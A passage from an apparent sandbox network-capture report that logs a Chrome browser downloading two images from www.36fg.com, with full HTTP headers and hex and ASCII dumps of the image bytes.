                                                        Data Ascii: :RDF> </x:xmpmeta> <?xpacket end="r"?>4oHiIDATx\TU>VHJnzR6FTl! JHv2j2r(('{HI=m-=L1O=;3+?9gOYJMFW0]p[[CqV3K:G#{*O9p1_
                                                        2025-03-15 00:17:55 UTC594INData Raw: 45 07 f5 76 71 8a b5 58 1b f9 2b 54 ff 7f 59 15 dd 75 4e 73 79 cd bc 30 90 8d 20 e0 68 66 7b 39 8f 0e 94 0d b2 bb 15 b1 ad 72 45 6e d3 62 94 66 1e d1 39 55 bc 5b e6 27 72 03 e7 c0 63 85 7b 3d 2c f0 4e f0 12 f0 59 41 d0 26 16 fe 16 2f 91 33 c2 bc 16 f5 1c ec e5 1d da ab 68 2b 34 e0 72 f3 10 33 a5 8a d7 a3 63 1e 6d d6 ae 6d 3b 16 30 94 e7 e0 e9 c2 3d 3a dd 41 ff 3a 43 db 8d 13 b8 13 bc c2 6e 5b c7 5c 2e 2f ee 24 0e e1 35 e8 74 95 02 d6 94 df fe 6d 95 6c f9 09 4d 03 23 15 b0 78 1a e5 5b 0d 02 2f 53 ce 69 4b 1d db 59 e0 1e 7e bf 99 05 a4 35 f1 2f 0d df f3 00 78 ad 69 4e a6 d4 20 c5 11 5b 10 57 97 0d 31 ef e5 0c 11 25 7d cf 0c 69 93 a3 42 b6 a2 10 9a be 6f 86 47 9b 51 5d 69 4d 3b 65 f0 a0 34 82 67 7b 08 ec b6 bb 87 ff fe a9 9c 9d a9 bf 85 cf 51 44 be 94 3b c2
                                                        Data Ascii: EvqX+TYuNsy0 hf{9rEnbf9U['rc{=,NYA&/3h+4r3cmm;0=:A:Cn[\./$5tmlM#x[/SiKY~5/xiN [W1%}iBoGQ]iM;e4g{QD;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.549750104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:55 UTC673OUTGET /static/picture/blog-author.png HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:55 UTC445INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:55 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 17542
                                                        Connection: close
                                                        Server: cloudflare
                                                        Accept-Ranges: bytes
                                                        Last-Modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        Etag: "60e7ae7a-4486"
                                                        Expires: Sun, 13 Apr 2025 11:46:45 GMT
                                                        Cache-Control: max-age=2592000
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cf-Cache-Status: HIT
                                                        Age: 45076
                                                        CF-RAY: 9207d4a42a2619a1-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-15 00:17:55 UTC924INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 5a 08 06 00 00 00 38 a8 41 02 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 76 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                        Data Ascii: PNGIHDRZZ8AtEXtSoftwareAdobe ImageReadyqe<viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e 2f 5c 32 59 00 00 40 a6 49 44 41 54 78 da 8c 7d 09 b0 64 67 75 de b9 4b ef 7b f7 db df bc d9 17 49 68 d0 02 23 21 b1 88 55 6c 36 21 e0 b2 c1 c6 d8 24 60 aa 62 3b 21 01 01 71 12 5c b1 83 83 97 94 5d 36 8e ab c0 b8 62 43 19 52 18 cc 6a 76 90 30 08 2d 08 8d 66 24 cd 3e f3 e6 ed 7b ef 7b df 7b f3 9d f3 ff f7 f6 ed f7 06 9c 81 d6 eb be fb 7f fe f3 9f f3 9d f5 da eb eb 5b e4 79 03 32 f0 3f fe bf fa c7 5f 3c 32 0c 03 fb 3c 7f a3 7c 37 4d 53 fe fa db fd df 24 57 c0 76 fe 66 a8 0b b9 ae 2b d7 91 7d a1 6d 7c 4e f8 9a 6a 1f ff 35 23 f8 fb 1c 1c 7f d2 20 f3 66 8f dc 83 d8 7f 00 c7 97 70 40 09 c7 c5 5c 77 90 c1 fe ae 69 5a 4d ec ab 60 7b 1d db f9 fb
                                                        Data Ascii: df:RDF> </x:xmpmeta> <?xpacket end="r"?>/\2Y@IDATx}dguK{Ih#!Ul6!$`b;!q\]6bCRjv0-f$>{{{[y2?_<2<|7MS$Wvf+}m|Nj5# fp@\wiZM`{
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 73 99 a7 0e 0e 73 9a 3e fe 20 ce fe 18 be bc ca 1f fc ff 2f 91 c3 ab 89 82 49 0d f6 06 8a 31 12 8d 50 79 7b 5b 94 11 cb df 1e 08 98 06 87 c6 e2 31 e1 b2 d5 d5 55 7a fa a9 9f d0 16 d0 14 73 5a a7 dd a5 6f 7d fd eb f4 d8 d9 67 69 ba 54 a4 4c 2a 41 35 10 ba 3f e8 63 90 9e 9c c7 30 af d3 eb 07 3a 07 2b e2 5b 98 c0 df b0 22 d6 3c 46 4d a5 5c 9a a2 b8 6f 1d dc ea 40 29 1e bb f5 39 b4 bc b2 41 bd 46 8d c6 67 67 e8 e4 c9 e7 92 0b 2e 7e ea 27 8f d3 9b de fa 56 7a cf 7f fd 7d 28 d2 14 2d 2f 2f 40 d4 44 c8 1d 40 99 f3 83 29 31 11 70 64 20 ab 83 25 ec 79 81 22 bc 91 66 d5 13 f3 36 ec ff 4b 5c 22 1b 70 20 d1 1e 52 df 48 0e 8f 5c 8f bf 87 08 1d 56 6e b6 1d a1 56 ab 41 df fa ea 57 e8 d4 3d 2f a2 43 c7 8e ca 40 2e 5f 38 47 0f 7f ff 41 5a 98 9f a7 e3 27 6e a2 2f 7d e1 0b
                                                        Data Ascii: ss> /I1Py{[1UzsZo}giTL*A5?c0:+["<FM\o@)9AFgg.~'Vz}(-//@D@)1pd %y"f6K\"p RH\VnVAW=/C@._8GAZ'n/}
                                                        2025-03-15 00:17:55 UTC1369INData Raw: f7 7e 84 bc 74 d8 3e 87 1d df c5 df 49 0a 2f 6f c3 27 9f 41 14 52 a8 e1 15 61 0c 3d 19 81 02 14 27 93 9e a8 30 66 0e 20 1e cb 52 10 a0 d1 68 50 b3 5e 13 c7 15 2b 3e 5e e6 c5 b1 02 2d 5e bf 46 3b 50 6e 51 10 37 01 98 c6 ab a4 dd ed 89 c2 62 f1 90 4f a5 a8 94 4f 8b 3f 23 0f d9 9b 4d 26 28 89 8f 8d 49 13 ef 1a 26 b6 08 68 98 88 f0 e4 3a 94 cf 65 69 0a 8a 2e 0e 2e af 54 2b e0 ee 28 cd e2 77 13 98 18 6c 40 93 20 fe e6 e6 56 bc d3 ed ff 7c 21 97 f9 5c ad 5a ad b2 42 b6 21 df bb 40 1c bc ca 5a ad 0e 75 01 e7 2a b5 16 26 3d 42 85 f1 71 25 92 7d 6e 0e 9b 8d be ec f4 8c b0 79 4d e3 f8 ef 77 71 c4 be a1 31 e3 0d 5d 51 43 7b 7d 84 60 e2 46 d4 57 f7 61 a4 17 72 95 aa e3 cc 90 b5 e9 0d 7d 2e ec a3 88 2a 1f c5 83 df fc 06 9d 7f e6 0c 15 4a 63 b4 b6 b2 42 d7 a1 d9 b3 99
                                                        Data Ascii: ~t>I/o'ARa='0f RhP^+>^-^F;PnQ7bOO?#M&(I&h:ei..T+(wl@ V|!\ZB!@Zu*&=Bq%}nyMwq1]QC{}`FWar}.*JcB
                                                        2025-03-15 00:17:55 UTC1369INData Raw: ef 1b 76 03 67 7f d8 33 b7 db 4b 17 76 36 99 21 bf ec 30 16 68 e9 d0 16 05 8e 2c de c6 03 ce e5 0b f4 d4 13 8f d1 f7 bf f3 3d 7a c5 2b ef a7 eb 0b 97 e8 d1 87 7f 40 f3 d7 16 81 91 22 42 18 72 64 f6 b0 6c 2d 71 14 b1 ec e6 e5 b4 6f 6a 1c 50 2f 2a fe e0 19 c8 f4 6b 1b db 74 e6 f2 82 88 15 1b 30 b1 8e c9 18 68 4c 9f 4e c6 84 e3 f9 51 79 bf 21 b8 dd 15 84 10 c3 c6 81 63 51 de 36 a8 de 75 e4 9c 38 ee db 83 dc 6d 60 a6 3d 96 fd 20 74 86 bd 72 80 76 4c 1d cb 30 5f 05 05 ff 6b b8 dc ff e9 60 55 b4 30 91 24 32 bb 0b f9 9f 20 63 55 44 87 17 f8 1c 34 87 67 31 e8 0b f8 3d 65 69 df 05 cb 55 07 17 16 39 bb cb 98 09 3b 80 86 d1 c7 bd ee d0 30 67 fb 01 57 5e 90 3e bc f4 27 e0 1f 3e f5 b7 74 f9 d2 55 28 a4 32 fd f0 07 0f d2 b5 f9 15 32 63 71 15 20 95 c5 e3 89 9c 65 25 e8
                                                        Data Ascii: vg3Kv6!0h,=z+@"Brdl-qojP/*kt0hLNQy!cQ6u8m`= trvL0_k`U0$2 cUD4g1=eiU9;0gW^>'>tU(22cq e%
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 02 2c 67 1e 2c 2e c0 31 3e 86 59 86 98 eb 10 49 30 5a 7a 0a 82 e0 af 23 51 12 be ee ea 66 99 f6 65 e2 74 60 bc 28 fe 09 76 ab a6 21 36 62 c2 c9 51 e1 62 46 1b ac 78 ed 58 02 9f 98 38 91 2c 10 cf 64 8b 13 db ad 44 4a 44 82 9f 4e 61 1a 6a 22 58 d4 58 f8 cb 06 1b 4f 08 6f e3 49 19 ba 1b 7c 11 14 63 c6 fc 0d 8c c9 e0 09 e3 09 34 bd 61 66 cd 7d ec 34 0a 52 b8 68 e8 f0 0f 27 3c 32 e7 f2 72 65 af 96 92 bf 5e e8 33 54 76 e1 8c 9d 00 5b fb a2 03 7f 59 69 8a af 59 fc c4 9c 8b d1 87 62 eb d2 4b 5e f6 32 ca e5 f2 b4 5d 6b 50 36 9f 57 56 1c ee 55 86 91 d1 06 5e ee f1 e0 19 e7 2a a1 a6 e0 18 08 5e 00 ae ad c3 98 e0 59 38 b6 7f 86 4a 50 76 1c 96 8a 43 64 24 a0 a4 58 a9 72 a0 c0 92 74 36 5b 26 90 9d 3e 4c 2c 21 34 1b 2f c2 b1 11 51 a6 0a 05 58 2a fd 42 f0 7b 44 ff b6 55
                                                        Data Ascii: ,g,.1>YI0Zz#Qfet`(v!6bQbFxX8,dDJDNaj"XXOoI|c4af}4Rh'<2re^3Tv[YiYbK^2]kP6WVU^*^Y8JPvCd$Xrt6[&>L,!4/QX*B{DU
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 70 05 46 8a de d0 36 82 ac 46 3d 56 4f c7 4d 39 a1 51 ae e9 03 2b d7 63 65 73 0b 26 df 38 b9 27 9b 73 57 06 67 d8 64 f6 09 34 cc 6c b2 03 59 1b 24 a6 bb 9e 36 62 9c 40 ac b0 4c 0b a7 35 78 fe 2c 05 d9 49 4a 91 0f 7a 6d aa d4 6a d4 c3 f3 c6 a0 fc 18 af 5b da 7a e3 83 66 80 8f a7 73 29 21 60 0c 46 4a 1c 32 9b 39 d5 b0 54 e8 8d cd 71 93 13 6a 04 13 2b a3 ca ec 77 c9 e0 68 3a 2f 0e 66 1a 59 e6 b6 ca bd f6 6c 05 cb b4 4f 5e 26 06 e2 c6 60 37 2c cb 5a 97 86 75 32 22 47 2c e1 70 76 c3 ba fe ca 10 6b d9 55 21 26 7e 4c c7 0d 7c 34 06 d3 cc a3 93 ec 26 bd 79 57 d2 a2 16 1d 86 9f d8 31 52 f4 32 74 79 2a 17 65 0f 37 54 e6 b7 23 ab cc 32 6c 1d ae d2 e6 b5 65 8d 24 39 8a 39 2b 4a 53 d7 b5 b8 ee 88 d2 5d bc 7e 9d d6 36 2a 62 71 f1 83 b3 ec 76 0d 47 88 c9 0e f9 1c a0 5c
                                                        Data Ascii: pF6F=VOM9Q+ces&8'sWgd4lY$6b@L5x,IJzmj[zfs)!`FJ29Tqj+wh:/fYlO^&`7,Zu2"G,pvkU!&~L|4&yW1R2ty*e7T#2le$99+JS]~6*bqvG\
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 4f 28 a5 bb 53 a9 d2 b3 97 e7 69 a3 52 01 ae 8e 51 7b 50 23 17 db d6 b7 2b d4 06 e4 e0 fa c2 8d 7a 9b 2e 62 95 30 34 e4 20 41 31 9d a1 fd 9c 8f 97 cd 52 71 7c 02 7a 21 4f 76 b3 4e 89 b1 71 e0 e3 08 0b 31 65 e5 81 50 bd 56 53 18 a9 5b af d3 e6 d2 12 f5 f1 f0 9c e4 53 a9 d6 e8 c2 e5 cb 12 31 ef 73 72 8f a3 68 31 51 cc 51 2a c2 b8 de 11 eb 70 65 75 4d 4c f0 3a 77 0e 08 e7 41 87 b9 79 98 f4 62 0f 0b 89 4c 33 a4 ec ac 20 94 e5 17 53 1a 7e f1 a6 b1 db c7 11 aa c0 65 45 62 aa a4 40 9e 00 ce c4 e4 f3 59 e6 be e8 a5 2f a7 43 13 45 ba b6 b1 43 e9 94 4d 1d c6 ea c4 9c 1d a5 04 13 2a a2 9c f8 cc 7d db 3b 15 5a db a9 d2 ca 76 55 ac d2 48 bb 27 01 d7 78 3c 2a c1 56 af e3 d0 e6 4e 9d 2a e0 36 4e 15 88 e1 bc 1c 38 7e aa d0 a2 3a 56 c1 44 ae 46 d9 ad 6d 9a 9d 9e a4 e2 c4
                                                        Data Ascii: O(SiRQ{P#+z.b04 A1Rq|z!OvNq1ePVS[S1srh1QQ*peuML:wAybL3 S~eEb@Y/CECM*};ZvUH'x<*VN*6N8~:VDFm
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 6f aa 40 e7 d7 eb 34 69 0f e8 8d af 7b 2d 1d 3d 7e 82 ce 34 d6 a8 06 e2 1e 3c 38 49 f9 74 9c 1e 3b 7d 9e 92 b8 76 32 53 50 2e 5d 4e f7 92 14 03 1e 37 90 48 26 4b 07 6e 2d 52 01 72 f9 89 6f 34 60 00 4d d2 ad 47 e6 e8 0e 58 a2 a9 fa 3a 7d fb c2 3a a5 e2 36 bd e0 de 57 d3 ec e4 7e 3a f3 e4 e3 b4 b3 b9 42 f7 40 3f f4 1a cd 8b ec 26 3d 6f 18 e1 90 95 39 a2 00 6f 64 96 8f 74 24 d0 ae ce f0 04 0c 89 e7 e9 cc d1 61 92 4d d8 8c 0f 2c c8 d0 3d b8 38 93 c1 ff e9 6f 7e 89 8e cc 4e 42 79 ed 50 0b ca 8b 33 e8 59 3c f0 32 e7 a7 63 54 91 cc 24 28 03 08 65 83 33 3d 86 5f 6b db 54 82 22 7c 71 b1 20 b2 79 1a 96 60 22 93 a3 0c 0c 94 89 e9 69 4a e6 73 a2 48 1d 28 c0 d7 bc fe b5 a2 c8 6a 30 3c d6 16 17 68 2c 8d 6b 41 91 31 f4 60 c8 69 e1 3b 87 a5 a0 c2 c5 d2 4c 42 04 31 dc eb
                                                        Data Ascii: o@4i{-=~4<8It;}v2SP.]N7H&Kn-Rro4`MGX:}:6W~:B@?&=o9odt$aM,=8o~NByP3Y<2cT$(e3=_kT"|q y`"iJsH(j0<h,kA1`i;LB1
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 2e e1 08 12 55 d8 e9 df 67 4e ed a9 20 2c df 2f a2 92 18 3d 28 55 4f 2a 01 74 de 05 47 68 1c 95 2a 2c a9 07 b8 5e bb bc 43 f5 6a 55 65 ea eb 84 47 0e 4f b1 88 90 d8 20 64 ac c1 f9 22 5c 7e 2c 51 f4 08 14 22 8c 27 ac b8 01 07 02 74 04 5e d2 7d 71 ac 30 23 47 8a 0c 15 5b 84 e5 f3 19 95 c7 67 a8 9e 4a fa df 43 18 c1 65 fa 17 fe 85 d3 72 fd 53 65 30 23 2b c1 08 72 40 82 20 ac 11 e6 66 37 04 f5 46 ad 4d bf a7 a9 84 c5 78 2d 62 e9 db bc ac b1 ad d5 ed a9 ae 89 de d0 48 62 2b 53 a2 dd 9c 6a 2b 9d 57 1c c9 32 62 ab d2 d5 79 25 12 1f 64 f4 c3 06 88 6e ca da ac d6 a1 2c b1 62 b2 79 71 bf 46 a0 68 2d 9d 8e 20 d1 17 7c 38 a4 65 41 0e f3 e4 99 92 a8 9e 84 5c 4e e1 ba 11 ea 00 69 f4 cb 5b d4 af 55 74 b5 ad a5 53 24 74 de 0c 68 89 71 3e 18 4c 44 68 f9 f3 a6 8f fd 0c 12
                                                        Data Ascii: .UgN ,/=(UO*tGh*,^CjUeGO d"\~,Q"'t^}q0#G[gJCerSe0#+r@ f7FMx-bHb+Sj+W2by%dn,byqFh- |8eA\Ni[UtS$thq>LDh


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.549751104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:55 UTC664OUTGET /images/defaultpic.gif HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC981INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:55 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 6408
                                                        Connection: close
                                                        last-modified: Mon, 30 Oct 2023 20:31:56 GMT
                                                        etag: "654012bc-1908"
                                                        expires: Sun, 13 Apr 2025 11:46:45 GMT
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 45076
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWEZT%2FpjBSga1ivFe3chyOltA9V1ukbi8ymS%2FKWvFbg3Ia23G2aTPGYLzzmFnbpNH9GfiZD%2FX8EQUXwheya6DIBvs8b4BRCsOdJUMuBtrImKO6CiU%2B0h5KKSGAMffrY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a4ca30efa7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1989&rtt_var=754&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1236&delivery_rate=1443400&cwnd=148&unsent_bytes=0&cid=59b650339b763eff&ts=164&x=0"
                                                        2025-03-15 00:17:56 UTC388INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 01 4a 08 06 00 00 00 6b 53 e7 6d 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 18 ba 49 44 41 54 78 9c ed dd 4f 6c 9c e7 9d 1f f0 df 9b 28 11 37 31 69 ae bb 70 58 b3 0b 09 58 60 45 1d 76 2d 14 95 ac a2 07 09 d1 2e 9c 4b 21 a9 3d 24 87 5a f1 cd 40 88 c5 5e 1d fb 92 4b bc be 6e 1d 2e d0 5b 45 9d f6 d0 98 3a 1a 5b 05 d2 a1 a8 44 a2 00 73 a9 a9 43 b7 e3 45 e9 d2 bb 8b 0d a3 31 9a 09 8a cd bb 87 57 43 0d 87 33 9c 79 e7 df 3b 33 cf e7 03 d0 12 87 c3 e1 63 9b e4 ef fb fc cf 2e fe e8 37 79 00 00 49 f9 4a d5 0d 00 00 26 4f 00 00 80 04 09 00 00 90 20 01 00 00 12 24 00 00 40 82 04 00 00 48 90 00 00 00 09 12 00 00 20 41 02 00 00 24 48 00 00 80 04 09 00 00 90 20 01 00 00 12 24 00
                                                        Data Ascii: PNGIHDRJkSmpHYs+IDATxOl(71ipXX`Ev-.K!=$Z@^Kn.[E:[DsCE1WC3y;3c.7yIJ&O $@H A$H $
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 00 00 80 04 09 00 00 90 a0 33 55 37 20 35 6b df 8a 58 5b 89 58 5d ae ba 25 4c ab fd c3 88 fd 5f 46 d4 7f 15 b1 f7 45 d5 ad 61 58 4b 0b 11 2f 2d 44 2c 9d 2d 7e ee 17 17 8a c7 17 17 8a 8f 75 f2 ac 11 51 7f fe f6 ec d7 c5 63 fb 87 11 9f 1f 4e a6 cd a4 41 00 98 80 a5 85 88 b7 de c8 e2 ce d5 17 3f fc d0 af bd 83 88 4f 0f 22 76 6a 79 ec 7c 56 14 02 a6 cb d2 42 c4 6b 2f 17 e1 7e 6d 25 8b d5 e5 38 7a 1b f5 cf 7c bd 51 7c 3f d4 1b 11 7b 07 79 ec 1d 14 21 61 a7 36 da af c3 fc cb 2e fe e8 37 79 d5 8d 98 67 37 2e 44 7c 70 2b 53 f8 19 99 ed 5a c4 d6 6e 1e 3f 7b 5a f4 14 99 ac a5 85 88 0b cf 47 f2 ae 9c cf a6 6a 44 6f ef a0 08 88 db b5 3c f6 be 10 0a 38 9d 00 30 46 eb d7 b3 58 bf 56 75 2b 98 57 f5 46 c4 7f dd 8b f8 8b 47 b9 51 81 31 6a 16 fc 1b 6b d9 f3 a2 5f 75 8b ca
                                                        Data Ascii: 3U7 5kX[X]%L_FEaXK/-D,-~uQcNA?O"vjy|VBk/~m%8z|Q|?{y!a6.7yg7.D|p+SZn?{ZGjDo<80FXVu+WFGQ1jk_u
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 9f ff 37 f4 4f 15 ec 0a 18 9c 00 00 89 ab 37 22 7e b6 37 dc 6b ac 5f d7 0b a3 3a 57 ce 3b 20 68 10 02 00 24 ee c1 5e 3e d4 f0 ff ea b2 79 58 aa f7 ee 77 5c 18 54 96 00 00 89 db 78 34 dc e7 ff e0 9a e1 57 aa b7 ba 1c f1 96 b3 01 4a 11 00 20 61 5b bb f9 50 c7 ff ae 2e 5b f8 c7 f4 b8 73 d5 28 40 19 02 00 24 6c d8 de bf c5 57 4c 93 c5 05 a3 00 65 08 00 90 a8 8d 87 c3 f5 fe 2f 9f 2f 16 5f c1 34 31 0a d0 3f 01 00 12 b4 7f 18 71 ef c9 70 af b1 6e ee 9f 29 64 14 a0 7f 02 00 24 e8 bd fb c3 ad fc d7 fb 67 9a 19 05 e8 8f 00 00 89 d9 78 98 c7 4e 6d b8 d7 d0 fb 67 9a 19 05 e8 8f 00 00 09 d9 ae 0d bf f0 6f 75 59 ef 9f e9 67 14 a0 37 01 00 12 b1 7f 18 f1 fe fd e1 8f fc b5 ef 9f 59 60 14 a0 37 01 00 12 b0 7f 18 f1 f6 dd e1 56 fd 47 d8 f7 cf 6c b9 75 49 58 3d 8d 00 30 62
                                                        Data Ascii: 7O7"~7k_:W; h$^>yXw\Tx4WJ a[P.[s(@$lWLe//_41?qpn)d$gxNmgouYg7Y`7VGluIX=0b
                                                        2025-03-15 00:17:56 UTC1369INData Raw: c3 ff bd a4 3e fc 1f 21 00 00 94 96 45 c4 ef bf 5a 75 2b 3a 5b 5c 30 fc df 8f 67 46 00 04 00 80 41 fc ce 4b c5 db b4 b9 73 35 33 fc df 87 7a c3 6d 89 02 00 40 49 f9 f3 da 71 f1 9f 57 db 8e 76 ab cb 11 b7 5e af ba 15 b3 c1 14 80 00 00 50 de f3 29 f6 57 5f 8a b8 f0 ad 6a 9b d2 ea 07 d7 f4 fe fb 35 0b 57 3a 8f 9b 00 00 30 84 3f 58 8d 78 e5 9b 55 b7 22 e2 ad ab 59 dc be 54 75 2b 66 c7 a7 ae 4b 16 00 00 86 f1 f5 af 46 7c fb 42 b5 bb 02 d6 56 22 7e f8 66 75 5f 7f 16 7d 69 11 a0 00 00 50 56 73 93 5d fe fc 9d c5 b3 11 ff f6 0f 23 96 2a 08 01 ab cb 11 1f 7d d7 b6 bf b2 3e 3d a8 ba 05 d5 13 00 00 06 94 45 14 29 20 2b 8a ff bf ff 97 59 bc 3c c1 10 b0 b6 12 f1 d3 77 cc fb 97 b5 a7 f8 47 84 00 00 50 5a de f6 d6 b4 b4 10 f1 bd cb 59 9c 7b 65 fc 6d 78 eb 6a 16 3f 7d 27
                                                        Data Ascii: >!EZu+:[\0gFAKs53zm@IqWv^P)W_j5W:0?XxU"YTu+fKF|BV"~fu_}iPVs]#*}>=E) +Y<wGPZY{emxj?}'
                                                        2025-03-15 00:17:56 UTC1369INData Raw: b7 ca 9f 3f 66 17 40 79 5b bb b9 55 ff 23 22 00 00 94 74 6c fe bf fd 1c 80 e7 4f 68 2d fa 79 db 73 b2 cc 22 c0 41 ec 1f 46 7c f8 49 d5 ad 98 1f 02 00 40 49 ad 07 01 e5 71 62 8d 5f 44 7e 3c 17 9c 58 22 d0 3a 1d 20 08 f4 a5 de 28 e6 fd 9f 35 aa 6e c9 fc 10 00 00 4a ea b0 e6 ef c4 29 7f cd c7 8f 3d a9 f5 29 99 d1 ff 32 36 1e 99 f7 1f 35 01 00 a0 a4 63 8b f8 4f b9 11 a8 5b 81 77 08 50 39 1b 0f cd fb 8f 83 00 00 30 80 bc f5 2f 1d 7a f7 27 9e d7 b6 26 40 ef bf 3f 9b 8f 73 fb fd c7 44 00 00 28 ab 6d 4b 5f 7b 35 6f dd 05 a0 d0 0f 6e ef c0 a2 bf 71 12 00 00 ca ea d4 c3 6f fd 70 d6 36 cc 7f ca 95 c1 12 42 67 fb 87 11 7f f2 97 26 4a c6 49 00 00 18 c0 b1 ba dd 36 0d 90 e7 1d b6 f9 e5 27 df 3d 71 2a 20 11 51 14 ff b7 ef 5a f4 37 6e 02 00 40 49 59 a7 bf 9f d6 cb 6f fb
                                                        Data Ascii: ?f@y[U#"tlOh-ys"AF|I@Iqb_D~<X": (5nJ)=)265cO[wP90/z'&@?sD(mK_{5onqop6Bg&JI6'=q* QZ7n@IYo
                                                        2025-03-15 00:17:56 UTC544INData Raw: 0b dc f9 6c be ff fd 06 b5 7f 18 b1 53 ab ba 15 30 1a 02 00 7d d9 78 a4 20 34 ed 1f 46 6c ed 56 dd 8a f1 da 7c 5c 04 3f 8e f3 73 c0 3c 11 00 e8 cb 4e cd d0 67 53 0a 45 a0 de 88 f8 e1 fd f9 ff f7 2c 63 bb 36 ff c1 8f b4 08 00 f4 ed bd ad 7c 6e 17 be f5 6b f3 71 9e 4c 11 f8 d9 5e 1a 61 a7 1f fb 87 11 ef 0b 44 cc 19 01 80 be d5 1b 11 6f df 4d 37 04 6c ed e6 f1 e1 27 55 b7 62 b2 36 1e 0a 01 7b 07 69 7f df 33 bf b2 8b 3f fa 4d da 3f dd 94 b6 ba 1c b1 7e 2d e2 d6 a5 ac ea a6 4c 44 bd 51 14 c1 cd c7 55 b7 a4 3a 97 cf 47 7c 70 33 8b d5 e5 aa 5b 32 39 f5 46 c4 e6 93 3c ee 3d 76 36 02 f3 49 00 60 60 97 cf 47 dc b9 9a c5 8d 0b 55 b7 64 3c ea 8d 88 8f 77 f3 b8 f7 64 7e f7 fc 97 75 eb 52 c4 8d b5 2c ae 9c 8b 58 5c a8 ba 35 e3 b1 